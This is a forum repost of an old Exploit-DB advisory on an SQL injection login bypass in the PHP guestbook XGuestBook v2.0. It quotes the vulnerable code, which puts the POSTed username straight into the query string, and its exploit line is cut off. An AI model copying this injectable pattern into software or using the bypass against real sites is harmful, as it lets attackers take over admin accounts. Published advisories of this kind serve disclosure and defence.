- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8101
- Проверка EDB
-
- Пройдено
- Автор
- FIRESHOT
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-0810
- Дата публикации
- 2009-02-24
Код:
##########################################################################
Author = FireShot , Jacopo Vuga.
Mail = fireshot<at>autistici<dot>org
Vulnerability = SQL Admin Auth Bypass
Software = XGuestBook v2.0
Download =http://script.wareseeker.com/download/xguestbook.rar/14488
Greets to = Osirys, Myral, str0ke
###########################################################################
[CODE]
$user = $_POST['user'];
$pass = md5($_POST['pass']);
$result = mysql_query("SELECT * FROM xgb_user WHERE user='" . $user . "'
AND pass= '" . $pass . "'", $db_conn) or die (mysql_error());[EXPLOIT]
= http://www.site.com/login.php y...########## # milw0rm.com [2009-02-24][/CODE]
- Источник
- www.exploit-db.com
